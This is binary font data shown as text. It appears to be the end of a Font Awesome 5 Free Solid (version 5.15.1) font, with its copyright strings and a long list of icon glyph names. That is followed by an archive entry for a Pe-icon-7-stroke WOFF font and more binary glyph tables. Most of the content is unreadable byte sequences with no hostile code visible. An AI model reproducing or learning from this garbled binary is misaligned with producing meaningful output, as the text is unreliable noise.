7	.!(88(".		*			��			7			7			O			2			����[`l62"&462"&462"&462"&4"/&=##!"&54>7546;546;2354?623'264&#!"3n^^^$
%)+B.�.B� O@)%
$��@zD:�H#%
$*:.BB.(	[p�
3:*$
% f S`@���((����2++"=#"=43%2#!"=43t�8�h�� 8��8�88����%19#+"&?.5475#"&=463!2;2=4+"264&"p /(�(/ 		`		��006tRRtR��2TGGT2�				������/9A%"/.7'#'76'"'&7>76'&"&4?264&"�5
uk>`@�k04
R*I%JDK
	�|5%�u45u0k�@`>k6R=+	KDJ$JR {%5�������)-15="&462232#!"&=46;5"#"'&67%65#%35+3"&462-��

��

�����``�``c�
<\
�

�
S;���`````` ����"&54676>'&'&'32D4H���_I9*
$:\K8+�0�+_��_6�D5: ��Y'	Cu ((8E����A�,X7'&67670767>767632%"#"/67>7>7>767�

5#$	
$7E #3

	%.&%
L	
$7E %C(

	%.
	 !5#p
!#
J$'

	%
%&!�
J6'/

	%&!!	!����2:%#!"&5463!2;;2=32=4+54+"#"5!"3�

��)77)F��808808��
Z	4
	7)@)7�088088��@��@�2##!"&5".546 AoH(#��	��2;�

	>k���	5!#!"&5!%630
�@
,Y{���

��Z�����@�,H3#!"&=26554+54+"#";;2=327#"/&"#"/&547%62 �	�`	;808808���M��		�D088088����

���22#"1"'#"547>7&5454+54+"#";;2=32�Ԗ�j73AL9`808808�z�z31:IVn088088�����%."/&4?627"/&4?6?7'76�
�7-nxf
fn-7
D
P	�
�7-nf
fxn-7{
D
	P����"*2:%/&&?6/&6?6264&"264&"6264&"�%">H7 F&3
&)'H!.L	���)			�C>")	4949/!=Ssm			����2"&546�b]2p�p2�u�7PppP7����'/7?%2#!"&4632#!"&=4637"&7>2#&"264&"264"264��`�	&��&	~�~>			�			�			�((�	&&	�42BB24p			)						 ����>%+"/&=4?2=4>3762=463212=46�B.�.!


'$
�S.B!J
L� �� 2	
�#%!5467546;272#!"&=463�@B5)	`	)5B		� 		�@@;aRp		pRa�	 		 	����>JVr~�$"&46220+"&50546322760!"&546;546;23254+";2=4+";27532=4+54+"#";;254+";2=4+";2P88P80.B�B.*�*��	
 
�
 
�((((0P((((�8P88PXB..B
*<	p
@

@
�4((�((��((�((�����
7AK#"&547664&"2767>7>7>7>76'.?6&/�/��"!/`(	
 ' ' 	
 ' ' �|�3��3�/B��/!"`w
' ' 
' ' �3��3� ����2#!"&46;&5462'!"p��TxT�cc	( ((	;UU;	��������%)A7"=4;54;232++"=%!463!2!2#!"&=46;;267�80880 ��@���	&�&	�
=�088088���P���`	&&	�#32#!"&54635#"3754&+326754&#!"3!26�&&��&&`P		�	PP	�
��

@
�&�&&&��0			0	�@

@
���0%3#"&4632>77'#5'6326'&54?632Kk%Kj�L!!1$5�26YK$(
�'"G@)!.!#+2-,&.D9N"+
$7���&.6.'7>#"&5476264&"6264&"264&"�Z�b9R�]
3X�K��
rC{�	_�Y]�P9qJ�Vi
L�{����	7!+"&7;;26=326/&"72#!"&=46;76;25��E9	 	9Z�		�`		x	r	S���p		p^�	 		 	

����	7!#!"&7;;26=326/&"72#!"&=46;76;2 ���[9	 	9Z�		�`		x	r	P���p		p^�	 		 	

����:B%#!"&54676"&=4?62';;2=32=4+54+"#"26=?6K"��"K6_5jKU

U�(/B/�N6""6N_oK5n  n5�]!//!����-#"&5#+"&=46;546;23546;2+ܘ`�		p�`�		p \�	 	����	 	�����'/7?G"&462'"&='&54?63232+"2"&4264&"$2"&4264&"�((4);*Rp		G5

@6jKKjKf4&&4&��jKKjKf4&&4&`((�!2
�

o6
	`9 KjKKju&4&&4�KjKKju&4&&4����2#!"&5463#3'#335#35#�

��

`������������
��

�
@�����������/?O_o��������/?O72+"&=46;2+"&=46;2+"&=463!2+"&=4632+"&=46;2+"&=46;2+"&=46372+"&=46372+"&=4632+"&=46372+"&=4632+"&=4632+"&=46;2+"&=46;2+"&=4632+"&=4632+"&=46372+"&=46372+"&=46372+"&=46;2+"&=463�		 		�		 		�		 		�		 		�		 		�		 		�		 		 		 		 		 		�		 		 		 		@		 		�		 		�		 		�		 		��		 		 		 		 		 		 		 		 		 		�		 		�	 		 		 		 		 		 		 		 	�	 		 		 		 		 		 	`	 		 	�	 		 	�	 		 	�	 		 	��	 		 	�	 		 		 		 		 		 	�	 		 	�	 		 	`	 		 	�	 		 	`	 		 		 		 	����/?O_o�72+"&=463#2+"&=46;2+"&=46372+"&=4632+"&=4632+"&=4632+"&=46372#!+"&5463�		 		@		 		�		 		�		 		 		 		 		 		 		 		 		��	 	
 	 		 		 		 		 		 	�	 		 	`	 		 	`	 		 	 	 		 	`	 	��		�
�����$,2/&?#"&'&6&546766264&"a=Z{
%A'#*=Z{
Q<#D@Q<#*(E-{
Q<#*=Z{
������+3Ig7'&6767>"2+"&=46;76;2264&"%2"&?#"&?6;26"&46325"&46325467ua5

5a�
�0H[,,�\
>L'&5%%p&5%%�c>>c`
���,,V�Sk	3`�(0l(k���%#"54?6327632����h0	<8y1Vh�p1y8<	����.2#!"&5463454/&#"&'7654/&#"#327���P	FK#&
A�x���`��
&#KF	x�����(4@PX_2+##546354+";254+";2=4+";2=4+";22#!"&5463"2645''`

���
H				`												�

��

M`� @�
��
@@`
g			�			q			q			0
��

 
@�``� @ ����;?%2+"&=46;7#"'&54?6325463!2+"&=#'7#P		�		 C	5��s	�		 	v1C v 	 		 	P4*�Y,		`		 �4`������5OR72"/&6;46;27"&=4?#"&=46;232#+"/#+"&54?6;23'�PP0	 	�	=8		�	=8			G	;*4 ```0		�Ѐ	
F	 		
F	 	�	

	�e0������5OR"&?62++"&5"&=4?#"&=46;232#+"/#+"&54?6;23'PP0	 	�	=8		�	=8			G	;*4  ``��		0@	
F	 		
F	 	�	

	�e0�����/?U"&=46;2#"&=46;2#2#!"&=4635"&=46;2#!2"/&6;46;2�		@		@		�		�		�				�		�PP0	 	`	 		 	�	 		 	�	 		 	@	 		 	``0		�������/?U"&=46;2#"&=46;2#2#!"&=4635"&=46;2#%"&?62++"&5�		@		@		�		�		�				�		�`PP0	 	`	 		 	�	 		 	�	 		 	@	 		 	�``��		0������5JR72"/&6;46;22+"&=46;5#"&54?6;26&/&767.7>264&"�PP0	 			`			
0	6(>*,


	$+
"```0		��@	 		 	@	 		p}1'3>=&\������5JR++"&5#"&?622+"&=46;5#"&54?6;26&/&767.7>264&"kP0	 	0P)		`			
0	6(>*,


	$+
"�`��		0`��	 		 	@	 		p}1'3>=&\��A�&@CX%"&=46;2#'3264&#3264&#'+"/#+"&54?6;23'"/&4?62762		K 2	2!3(

(8

�D	X	D;.��p-
7�
�	�	*# +�0`0��	$$	��E�
�p
-8��� �@#2#!"&4623&54264&"264&"�xTT<��<TTxTp��/B//B`B//B/@TxTTwUU;,$$,<B//B/�/B//B����
5%"'63227632".'&5463232>7632�G�G';(;�4Bt�tB4	!47K'6d?7���	D5++5D	

������-%3!"'&7>32#"./&#"7>?632b!-9<&��Z:5)=1$+b6@�#�U!FV ,$	T+A)����	=!+"&#546;2#5�^B@B^��^B@B^�`��B^^�� B^^B �����2"&4264&"2"&4264&"�V==V=^OΑ�Α�jKKjK(=V==VC�Α���KjKKj����"*:D$2"&42#!"&5#"&5463!2264&"754&+";2654&+"�			�		��8P8 &&`B^�l((p
�

�
�
@
�			g	 	(88(&&^B�p((�@

@
s�

�V6�� �H&�
,v�3m��	4	2Q	
�	@�	2	Lb	,�	
X	.�	&�	
'	29	&�	
�Copyright (c) Font AwesomeCopyright (c) Font AwesomeFont Awesome 5 Free SolidFont Awesome 5 Free SolidSolidSolidFont Awesome 5 Free Solid-5.15.1Font Awesome 5 Free Solid-5.15.1Font Awesome 5 Free SolidFont Awesome 5 Free Solid331.521 (Font Awesome version: 5.15.1)331.521 (Font Awesome version: 5.15.1)FontAwesome5Free-SolidFontAwesome5Free-SolidThe web's most popular icon set and toolkit.The web's most popular icon set and toolkit.https://fontawesome.comhttps://fontawesome.comFont Awesome 5 FreeFont Awesome 5 FreeSolidSolidFont Awesome 5 Free SolidFont Awesome 5 Free SolidFont Awesome 5 FreeFont Awesome 5 FreeSolidSolid���	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvw�
xyz{|}~���������������������������������������������������������������������������������������������������������������������"�����������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJK�LMNOPQRSTUVWX�#YZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~����������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefg�hijklmnopq�rstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcd�efghijklmnopqrstuvwxyz{|}~���������������������������������������������������������������������������������������������faucettrailerbacteria	bacterium
box-tissuehand-holding-medical
hand-sparkles
hands-washhandshake-alt-slashhandshake-slashhead-side-coughhead-side-cough-slashhead-side-maskhead-side-virus
house-userlaptop-houselungs-virus
people-arrowsplane-slashpump-medical	pump-soapshield-virussinksoapstopwatch-20store-alt-slashstore-slashtoilet-paper-slashusers-slashvirusvirus-slashvirusesvestvest-patches
glass-martinimusicsearchheartstaruserfilmth-largethth-listchecktimessearch-plussearch-minus	power-offsignalcoghomeclockroaddownloadinboxredosynclist-altlockflag
headphones
volume-offvolume-down	volume-upqrcodebarcodetagtagsbookbookmarkprintcamerafontbolditalictext-height
text-width
align-leftalign-centeralign-right
align-justifylistoutdentindentvideoimage
map-markeradjusttintedit
step-backward
fast-backwardbackwardplaypausestopforwardfast-forwardstep-forwardejectchevron-left
chevron-rightplus-circleminus-circletimes-circlecheck-circlequestion-circleinfo-circle
crosshairsban
arrow-leftarrow-rightarrow-up
arrow-downshareexpandcompressexclamation-circlegiftleaffireeye	eye-slashexclamation-triangleplanecalendar-altrandomcommentmagnet
chevron-upchevron-downretweet
shopping-cartfolderfolder-open	chart-barcamera-retrokeycogscomments	star-half	thumbtacktrophyuploadlemonphonephone-squareunlockcredit-cardrsshddbullhorncertificatehand-point-righthand-point-left
hand-point-uphand-point-downarrow-circle-leftarrow-circle-rightarrow-circle-uparrow-circle-downglobewrenchtasksfilter	briefcase
arrows-altuserslinkcloudflaskcutcopy	paperclipsavesquarebarslist-ullist-ol
strikethrough	underlinetablemagictruck
money-bill
caret-downcaret-up
caret-leftcaret-rightcolumnssort	sort-downsort-upenvelopeundogavelboltsitemapumbrellapaste	lightbulbuser-mdstethoscopesuitcasebellcoffeehospital	ambulancemedkitfighter-jetbeerh-squareplus-squareangle-double-leftangle-double-rightangle-double-upangle-double-down
angle-leftangle-rightangle-up
angle-downdesktoplaptoptabletmobile
quote-leftquote-rightspinnercirclesmilefrownmehgamepadkeyboardflag-checkeredterminalcode	reply-alllocation-arrowcropcode-branchunlinkinfoexclamationsuperscript	subscripteraserpuzzle-piece
microphonemicrophone-slashcalendarfire-extinguisherrocketchevron-circle-leftchevron-circle-rightchevron-circle-upchevron-circle-downanchor
unlock-altbullseye
ellipsis-h
ellipsis-v
rss-squareplay-circleminus-squarecheck-square
pen-squareshare-squarecompasscaret-square-downcaret-square-upcaret-square-right	euro-sign
pound-signdollar-sign
rupee-signyen-sign
ruble-signwon-signfilefile-altsort-alpha-down
sort-alpha-upsort-amount-downsort-amount-upsort-numeric-downsort-numeric-up	thumbs-upthumbs-downfemalemalesunmoonarchivebugcaret-square-left
dot-circle
wheelchair	lira-sign
space-shuttleenvelope-square
universitygraduation-caplanguagefaxbuildingchildpawcubecubesrecyclecartaxitreedatabasefile-pdf	file-word
file-excelfile-powerpoint
file-imagefile-archive
file-audio
file-video	file-code	life-ringcircle-notchpaper-planehistoryheading	sliders-h	share-altshare-alt-squarebombfutboltty
binocularsplug	newspaperwifi
calculator
bell-slashtrasheye-dropperpaint-brush
birthday-cake
chart-area	chart-pie
chart-line
toggle-off	toggle-onbicyclebusclosed-captioningshekel-sign	cart-pluscart-arrow-downshipuser-secret
motorcyclestreet-view	heartbeatvenusmarsmercurytransgendertransgender-altvenus-doublemars-double
venus-marsmars-stroke
mars-stroke-v
mars-stroke-hneuter
genderlessserver	user-plus
user-timesbedtrainsubwaybattery-fullbattery-three-quartersbattery-halfbattery-quarter
battery-empty
mouse-pointeri-cursorobject-groupobject-ungroupsticky-noteclone
balance-scalehourglass-starthourglass-half
hourglass-end	hourglass	hand-rock
hand-paper
hand-scissorshand-lizard
hand-spockhand-pointer
hand-peacetv
calendar-pluscalendar-minuscalendar-timescalendar-checkindustrymap-pin	map-signsmapcomment-altpause-circlestop-circleshopping-bagshopping-baskethashtaguniversal-accessblindaudio-descriptionphone-volumebrailleassistive-listening-systems#american-sign-language-interpretingdeaf
sign-language
low-vision	handshake
envelope-openaddress-bookaddress-carduser-circleid-badgeid-cardthermometer-fullthermometer-three-quartersthermometer-halfthermometer-quarterthermometer-emptyshowerbathpodcastwindow-maximizewindow-minimizewindow-restore	microchip	snowflake
utensil-spoonutensilsundo-alt	trash-altsync-alt	stopwatchsign-out-altsign-in-altredo-altpooimages
pencil-altpenpen-altlong-arrow-alt-downlong-arrow-alt-leftlong-arrow-alt-rightlong-arrow-alt-upexpand-arrows-alt	clipboardarrows-alt-harrows-alt-varrow-alt-circle-downarrow-alt-circle-leftarrow-alt-circle-rightarrow-alt-circle-upexternal-link-altexternal-link-square-altexchange-altcloud-download-altcloud-upload-altgemlevel-down-altlevel-up-alt	lock-openmap-marker-altmicrophone-alt
mobile-altmoney-bill-altphone-slashportraitreply
shield-alt
tablet-alttachometer-alt
ticket-altuser-altwindow-closecompress-alt
expand-alt
baseball-ballbasketball-ballbowling-ballchesschess-bishopchess-board
chess-kingchess-knight
chess-pawnchess-queen
chess-rookdumbbell
football-ball	golf-ballhockey-puck	quidditchsquare-fulltable-tennisvolleyball-ball	allergiesband-aidboxboxesbriefcase-medicalburncapsulesclipboard-checkclipboard-list	diagnosesdnadolly
dolly-flatbedfile-medicalfile-medical-alt	first-aidhospital-althospital-symbolid-card-alt
notes-medicalpalletpillsprescription-bottleprescription-bottle-alt
procedures
shipping-fastsmokingsyringetabletsthermometervialvials	warehouseweightx-raybox-opencomment-dots
comment-slashcouchdonatedovehand-holdinghand-holding-hearthand-holding-usdhand-holding-waterhands
hands-helping
parachute-boxpeople-carry
piggy-bankribbonrouteseedlingsign
smile-winktape
truck-loadingtruck-movingvideo-slash
wine-glassuser-alt-slashuser-astronaut
user-check
user-clockuser-cog	user-edituser-friends
user-graduate	user-lock
user-minus
user-ninjauser-shield
user-slashuser-taguser-tie	users-cogbalance-scale-leftbalance-scale-rightblender	book-openbroadcast-towerbroom
chalkboardchalkboard-teacherchurchcoinscompact-disccrowcrowndice	dice-five	dice-fourdice-onedice-six
dice-threedice-twodoor-closed	door-openequalsfeatherfroggas-pumpglassesgreater-thangreater-than-equal
helicopter	kiwi-bird	less-thanless-than-equalmemorymicrophone-alt-slashmoney-bill-wavemoney-bill-wave-altmoney-checkmoney-check-alt	not-equalpaletteparking
percentageproject-diagramreceiptrobotrulerruler-combinedruler-horizontalruler-verticalschoolscrewdrivershoe-printsskullsmoking-banstore	store-altstreamstroopwafeltoolboxtshirtwalkingwalletangryarchwayatlasaward	backspacebezier-curvebongbrushbus-altcannabischeck-doublecocktailconcierge-bellcookiecookie-bitecrop-altdigital-tachographdizzydrafting-compassdrum
drum-steelpanfeather-alt
file-contract
file-downloadfile-exportfile-importfile-invoicefile-invoice-dollarfile-prescriptionfile-signaturefile-uploadfill	fill-dripfingerprintfishflushed
frown-openglass-martini-altglobe-africaglobe-americas
globe-asiagrimacegringrin-alt	grin-beamgrin-beam-sweatgrin-heartsgrin-squintgrin-squint-tears
grin-stars
grin-tearsgrin-tonguegrin-tongue-squintgrin-tongue-wink	grin-winkgrip-horizontal
grip-verticalheadphones-altheadsethighlighterhot-tubhoteljointkiss	kiss-beamkiss-wink-heartlaugh
laugh-beamlaugh-squint
laugh-winkluggage-cart
map-markedmap-marked-altmarkermedal	meh-blankmeh-rolling-eyesmonument
mortar-pestlepaint-rollerpassport	pen-fancypen-nibpencil-ruler
plane-arrivalplane-departureprescriptionsad-crysad-tearshuttle-van	signature
smile-beamsolar-panelspasplotch	spray-canstamp
star-half-altsuitcase-rollingsurprise
swatchbookswimmer
swimming-pool
tint-slashtiredtoothumbrella-beach
vector-squareweight-hangingwine-glass-alt
air-freshener	apple-altatombonebook-readerbraincar-altcar-battery	car-crashcar-sidecharging-station
directionsdraw-polygonlaptop-codelayer-grouplungs
microscopeoil-canpoopshapesstar-of-lifeteeth
teeth-open
theater-masks
traffic-light
truck-monstertruck-pickupadankhbible
business-timecitycomment-dollarcomments-dollarcrossdharmachakraenvelope-open-textfolder-minusfolder-plus
funnel-dollargopuramhamsabahaijedijournal-whillskaabakhandalandmark	mail-bulkmenorahmosqueompastafarianismpeaceplace-of-worshippollpoll-hpray
praying-handsquran
search-dollarsearch-locationsockssquare-root-altstar-and-crescent
star-of-david	synagoguetorah
torii-gateviharavolume-muteyin-yang
blender-phone	book-dead
campgroundcatchair
cloud-moon	cloud-sundice-d20dice-d6dogdragondrumstick-bitedungeonfile-csvfist-raisedghosthammerhanukiah
hat-wizardhikinghippohorsehouse-damagehryvniamaskmountain
network-wiredotterrunningscrollskull-crossbonesspidertoilet-papertractoruser-injuredvr-cardboardwindwine-bottlecloud-meatballcloud-moon-rain
cloud-raincloud-showers-heavycloud-sun-raindemocratflag-usameteorperson-booth	poo-stormrainbow
republicansmogtemperature-hightemperature-lowvote-yeawaterbaby
baby-carriage	biohazardblogcalendar-day
calendar-week
candy-canecarrot
cash-registercompress-arrows-altdumpster
dumpster-fireethernetgiftsglass-cheers
glass-whiskeyglobe-europe
grip-linesgrip-lines-verticalguitarheart-brokenholly-berry
horse-headiciclesigloomittenmug-hot	radiation
radiation-altrestroom	satellitesatellite-dishsd-cardsim-cardskatingskiing
skiing-nordicsleighsmssnowboardingsnowmansnowplowtengetoilettoolstramfire-altbaconbook-medicalbread-slicecheeseclinic-medicalcomment-medicalcrutchdiseaseegg	hamburgerhand-middle-fingerhard-hat
hospital-userhotdog	ice-creamlaptop-medicalpager
pepper-hotpizza-slice
trash-restoretrash-restore-alt
user-nursewave-squarebiking
border-allborder-noneborder-stylefanicons	phone-altphone-square-altphoto-video
remove-formatsort-alpha-down-altsort-alpha-up-altsort-amount-down-altsort-amount-up-altsort-numeric-down-altsort-numeric-up-altspell-check	voicemail
hat-cowboyhat-cowboy-sidemouserecord-vinylcaravan������۠�@۠�EPK!u����� flex/fonts/Pe-icon-7-stroke.woffnu&1i�wOFF��pOS/2``"�cmaphLLU� gasp�glyf�����Ƴ>�headݰ66E	�hhea��$$��hmtx�88}~loca�D����bmaxp��  ��name���vͫ�post�  �LfGLf��@������  8
 ����� ���������7979793��,1Jc#54&'.#!"3!2654&#%!2!5467>3!!'3267>54&'.#"3#"&'.5467>32�8�������b��xx				D



W/��+E//��"�ޑ						+��'@35#7'#537'"3267>54&'.#"&'.5467>32#�F::FR"<<,N!!N,,N!!N,)GG))GG)V:�:v!4�!N,,N!!N,,N!�gG))GG))G+��)D_�35#7'#5377>7>54&'.'>7>54&'.''>7>54&'.'"&'.5467>327.'.#"3267>7'#�F::FR"<<�		

))Y)GG)&
"*,N!!N,*"
&V:�:v!4`
  

""
�

						



�G))G
!N,,N!
mS2Kd"#>7>54&'.#"3!267>54&'.#467>32#"&'.5"&'.5467>32#�*
�
*****��

$#

#$

|#

#$



$S*



*****s$

$$

$b
$$

$$
O�q"3:54&'.#!"3!267>=35##!"&=463!27#'573�n	��			p*,���usOBJ		�		KC����F1E�3��z�"3267>54&'.#2.'.'.5467>7>76&'0&14676&'.'.'#0#.'.5467>3>7>7>54&'.'4&'.'&476456&'&67>7>73#"&'.'*K  K**K  K*'D






D'�
	


		
%$
� K**K  K**K D'!



	!'D��			

U����%7'735#!#3!KWWB4o4o����WWB���"��E��U��#(%#5467>32354&'.#"#!5#!5!w�
##
((<V4#��4�f"



"""((f��������_�5#7467>323467>323267>5##"&=1467>323467>323>54&'.'".'.#".'.#".'.#">7>32.'.#	3Z"!'	


		
	'!"Z3�

	

	



(  T//T  (�)"#[3�		�
3[#")�
		

		

		
	.Q""Q.	^��$/>CGK#54&'.+"#3;267>535'46;2#51+"&51533#'�UVU
�
�
V
x�
�
�x!��

��

D

��

C��!������������uz��%'7''73267>7>76&/?'.'.#"'7'7.#"733267>7>76&'773267>7>54&'7'#*'?#&47>7>7>327'.7>7>7>32?#"&/#"&/7�[$<H	

''		
IfC$CfH	
('				H=$Z�e++y
	6
�
8	�
	Z$ZDZ$=H



&(


HfC$CfI		


('		
I=$Z	R++��
8		�

6		�eZ$Z	
+��T7013267>54&'0&#'&"7*##35#"&'.5467>7'3267>54&'.#�

hP'DG))G
	!N,,N!!N,�
	Og�	]U F')GG)'"*,N!!N,,N!����
&3#5''73'3267>54&'.#"3#"&54632�q���YH��bPw3



���rY���Od^



3��1Jc��"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32#74&'.#"73267>77'>7>5!467>32#"&'.5	



					

2222++++� K**K 

	#
#
  
#
"	

�wD''DD''D'		
		
		x	

	�2112�,,,,x*K  K*,#,
+		+
,",&EE&'DD'
���16;@EJOTY"3267>54&'.#"&'.5467>32#3#53#5'3#5!3#57'7'7'7'7..//((((�ff�ffGG��GGGG^GG`/../�((((ogg�fff��
GH��GGvHG
��GG��'35!57''7!57���#3"g����Ԁ���-xx����>eg��g���NN�<��(AT77'.'.'5#3267>54&'.'"&'.5467>32#75#35>54&'�*!&CG))G�%AA%%AA%	



T*"" E')GG)%��A%%AA%%A�pp

$$

��
'#7'7#'7/373666��6��6��'nn+c�**�n��f�hh�fltPP�G��O=�
2M3353#53#?'#5377>7>54&'.'>7>54&'.'3�}~�DD�bfgf�		
		
	


		7	wggeDhfUUYQ�SUe&'
 +* 
7



1��1Lg�%"3267>54&'.#"&'.5467>32#5">7>327.'.#5">7>327.'.#">7>327.'.#
		

		


(	
%%
	(#C2/?""?/2B$6'
$12$
'5�	
				
	x
		
�



�,*+
,D

&
#


#
%

*%��%#'#337'#37'737'#}8e�VO�l8MM��OVS
�e8MM8lS�7��8LMDWz7
ML8X3��	0!!!!%3267>=35#3#"&'.=35#33��f���x��((3
##
3��f��wx���));;"

";;��^w��".'.#"3267>73267>54&'.#"'>7>54&'73267>54&'.#2#"&'.5467>3'"&'.5467>32#%"&'.5467>32#�		�
		



	�

					��		



	U

�D�		
T

			]				
		\		T	
		��

D�

<��3Oj�"3267>54&'.#2#"&'.5467>3#"&'.=3267>75#"&'.=3267>75#"&'.=3267>7)GG))GG)(AA((AA(�A((A%77%A((A%77%A((A%77%�
#�#

##
��/D



//V/

/7��!:%'>7>54&'.#"3267>77%467>32#"&'.5�t	;!";;"


t�5445,t


";;"!;	t�5544G��c�����1Jl���%>7>'.'.#".'.#".'.#"3267>73267>73267>76&'.''2.'.'.'.'>7>3.'.'.'.'&454&5465<7>7>7>7>7.'.'>7>7.'.5'.'>77467>77>7>7.'.'<5<5'2.'.'>7>3>7>32.'.'&47"&'.'&67>7#"&'.'>7>7#7#"&'.'>7>7>7>7�			




				

^								

			P

E

W			>		U


�	
	
	(		
|


�	

� 
"
!
 
!
"
 t		�				



	
	BN	
<

�




^	�P




^		^��7!'!3#53#5^����3��"檪����fxx���kkg��D+
��
%!7'7'!5#%!7'!3���H\\Gx��hH\\G��qH\\G�VH\\G�3����)-%#"&'.5467>37'"3267>5#5�D''DD&��*J  K**K �oo�&EE&'DU^]U J+*K  K*@A�>�1m�%4654&'.#".#"3!267>54&'.##!"&'.5467>?>7>327>7>320132#'"&'.5467>37'"3267>5##�0%
			

%="

"��	
		
*

�

@@



�0

	
%
#"

�

			)


<	
	%%



	+��'8ER_ly����������"/HUn{0&1%&!"3!267>54&'.##!"&5463!2%"32654&#4&#"32657"32654&#"32654&#4&#"3265'"32654&#2654&#"3"32654&#3"32654&#'"32654&#2654&#"3"32654&#3"32654&#'2654&#"37"32654&#"32654&#"32654&#5"32654&#5"32654&#"3267>54&'.#"&54632#"3267>54&'.#"&54632#���#��		z	��z�^��kk^�����onn7�								NUD	��		�����@3go��3�3
		
"#



""��27<E"32654&#3"32654&#%#5##";35326=4&#%3#5#537#5##5!x



3



*^�^^�^�������gV�V�







DUU�DD�DDD�x��Dff��X�h%'7%'7��޼��3��޻���kkk�k��kkk�3��73#5#"&'.5467>753267>54&'.'�^'
D''D

%+ K**K -���""3&EE&2"&8*K  K* 9&3)��
%5##!#'3#53#5##53#5353353!<x���gVV��x��gVV�x���m**��D*�""�x33��""�+��1="3267>54&'.#"&'.5467>32###33535#,N!!N,,N!!N,)GG))GG)	vvww�!N,,N!!N,,N!�gG))GG))GDwvvf-��
'-x�4��u��*��������'I/?>?'77>7>323''?06?7'7>'&"#"'�e]T�-�O		
O'-VN'aZ_V'VU��e[d(UV,'O			P�,�OW�YU`��VU'We$��5!3!#!!#!!��o;�;��o��*���oWE��E3�4�E��x����',7<#";267>54&'.#+"&=35#3#546;23#5q�		�		�������44��b��KOO`��"������=jot''&"326?.#"01"1023267>7>76&'7'>7>753461425263>7>32'7'7�D����

 A��
	'&	Ve,e,�,�,��D����P		B��
'%	ee,e,E,�,�+��77'%'7�L�V�wF�G;і����E4�уw��/����KPm54&'.#!"#"372#35#54&'.+1#"&=46;3!267>=35##53#!"&'.=467>3!2�	��

�
"U"�	�33�	��			�		
;
;��;

;		�w��]		F		F3��-=#"3!#'53#3753!"5467>3"&'.5467>3!!�		
T�*.Xw?;���	D���
		��	
��'(��56�����

M<��..#"5!!#7>54&'!337#57>32�
	K��DLM���#�A���K��L
	��"�%��X�
�X�h7'577'5���������h��kk���kk�+��):?DINS#03:3:3267>541!"&=3+%#!>7>5!3#53#53#57#35#53�f
			U45c
��/U	b
��"��������������r

i�gzs
	"

	b��D�<怀o^^+��	-6O3#53#53#5%4&'.'*#"326764=7'5#"&5467>;1+������3w1ee#
�%5WLM� (

��		
#�
A		��


3����;Tm.'.#"3267>517.'.#"3267>5<51"&'.5467>32#%"&'.5467>32#��	

	
	�
	



	
��				�d�


	


X�



		
'�?		^				�����1;EU5467>7>=#3267>=4&'.'#5#467>7#5"&'.=3#	


+//+ff%�%fo(�(W	**	,..,|w&&w�'bb'�1Jc|�"3267>54&'.#"&'.5467>32#%"3267>54&'.#"&'.5467>32#'"3267>54&'.#"&'.5467>32#3



�



�UUUUU+��$J3267>7#"&'.5467>773267>7#"&'.5467>71� J*
%3)I
%/#<"O-&E'$'C�
*I 	&

 H*2%
&	(D%-O"=$
D&"
"��%!3#35#53!!�D�;�;�U��fq3��DD"��o����5]%267>=4&'.#"3467>32#"&'.=#"&'.=###35#5#>7>=##

#"



"M






�//2M�L2z
"�"



"�"




�

�UU..UU4UU4U3O�q	!5!!5!!5!7!!5!5!7!!53��f���x�w��fx����fx��qDD3""�DD3""�DD3""+��
!'1'77'7'77'q^fooffod�UUfUUgUUfUU�/38��8448f3��*@+��**A+��**@+��**A+��U����3Oi2'.'.5467>3267>54&'.#"35">7>54&'.#1"&'.5467>32#1 8��8 



#>	��	>#				�8 
	
��
	
 8�	
				
	�>$
	�	
$>�				+X�h !!#"/!57326?!%'7�g���f��oo
n//n��{ooh����oo��m//m
oo�+����#,1'.#"!'%762'.#"'71571762!%'7Ժ���r��{-.{	fopc
����{qq������{..z	�n�p{	����pq+����).5>CHMR'.#"#!'5'62#7'.#"'537'751571762!%'7%3#53#553#5Ժ)=U�BB�TJ3(-.'��:C	
po
����{qq�xxxxVV�(>U��B�B�-4�(..'�:�B	-pn��	����pqmf3D��#(G#"&'.=#3267>=##53!#53"&'.=33267>=3#VfD''DfUDD��DDg#>D
&&
D>#����&EE&�3333�x>#��%%��#>qO@w7"&'.5467>321#35#'#.'.#"3267>7'#%">7>32#"&'.'1'33267>54&'.#G���#

#		"<!	
((
	
"		
	#

#	98

((3���
##
	!<!((
�	
##

88((Fz1Jc|�"3267>7.'.#"&'.'>7>32#5"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32##@>"7E++J  56  J*&>299%B22B&%%%%







				z9$857��1!210�%%%%�



�



g				U��#(%54&'.#"#!5#'467>32#5!5!o((<V<�
##
����4�f((f��f"



"ff�������w�7F375#3#'553##'3"3267>=4&'.##"&=4632�;x;���;VVXV/�--



	�3g��fg3�"""^��'QM^	"		"	<""+��2m%"&'.'7326?>54&/.#"'7>32#"&'./.546?>32'.#"3267>?#

	k
		
		LLk�k

	k
		


HH�		

	l		
		
KKl	�	k	

	l		GG	+!��&N2'.'.5467>32>7>35".'.#"7>7>54&'.#1^%��%+��	
+�%
	��		
%				+
��
+U����/4A�4&'.#"1202135467>71>7>553#"&54632#8##5>7>54&'.#"#54&'.'041"4#04#.'.5467>32�>##>
		�		
�ff3



\*		*	8  8	-#>>#'
	xx
	
'��33"



j
"��"

# 88 #+��16"3267>54&'.#"&'.5467>32#'3#5,N!!N,,N!!N,)GG))GG)n���!N,,N!!N,,N!�gG))GG))G�<��1Jc|�����+D]v���7"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#"3267>54&'.#"&'.5467>32#267>54&'.#"352#"&'.5467>3"3267>54&'.#"&'.5467>32#o���UwU;	

	V

<UwU;	

	V

<UU	

	V

+O�q.9H%''77'7!3;267>?>7>5735+"&/!7#!"&='!?3334
33
4�V�S�	>1
��
p�3333333�"
��
"�
